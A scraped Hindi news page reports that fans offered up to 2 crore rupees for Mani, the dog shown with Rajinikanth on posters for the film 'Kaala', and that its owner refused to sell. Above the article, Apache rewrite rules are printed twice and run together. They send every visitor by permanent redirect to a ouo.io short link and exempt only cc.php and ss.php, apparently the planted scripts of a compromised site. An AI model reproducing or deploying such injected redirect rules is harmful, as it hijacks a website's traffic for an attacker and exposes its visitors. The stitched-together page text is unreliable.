
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 467
मुंबई। सुपरस्टार रजनीकांत अपनी हर फिल्म के रिलीज होने से पहले मीडिया की सुर्खियों का हिस्सा बन जाते हैं। रजनीकांत की आने वाली फिल्म ‘काला’ के पोस्टर्स में उनके साथ नजर आ रहा कुत्ता चर्चा का विषय बना हुआ है। आपको भी शायद यह जानकर हैरानी होगी कि रजनी के फैन्स इस कुत्ते के लिए 2 करोड़ रुपए तक देने के लिए तैयार हैं। मीडिया रिपोर्ट्स के मुताबिक इस कुत्ते का नाम मणि है। जानकारी के मुताबिक मलेशिया तक से इस कुत्ते को खरीदने के लिए ऑफर्स आ रहे हैं। मीडिया में गॉसिप का हिस्सा बनते जा रहे इस कुत्ते के लिए लोग 2 करोड़ तक देने को तैयार हैं। इस कुत्ते के मालिक सिमोन ने बताया कि उन्हें लगातार मणि को बेचने के लिए ऑफर्स आ रहे हैं। सिमोन ने कहा कुछ लोगों ने मणि के लिए एक से दो करोड़ रुपए तक देने को भी तैयार थे। हालांकि सिमोन ने मणि को बेचने से इनकार कर दिया। सिमोन ने बताया कि उन्होंने मणि एक स्ट्रीट डॉग था जिसे उन्होंने देखभाल कर बड़ा किया। सिमोन ने रजनीकांत और मणि के बीच रिश्ते के बारे में भी जिक्र किया। उन्होंने कहा कि रजनी सर उसे रोज बिस्किट खिलाते थे। इससे ट्रेनर्स का काम आसान हो जाता है जिसके कारण रजनीकांत और मणि के बीच अच्छे संबंध कायम हो गए थे। बता दें कि रजनीकांत को दक्षिण भारत में देवता की तरह पूजा जाता है और कई फैन्स का मानना है। इस फिल्म का पोस्टर पहले ही सोशल मीडिया पर हिट हो चुका है।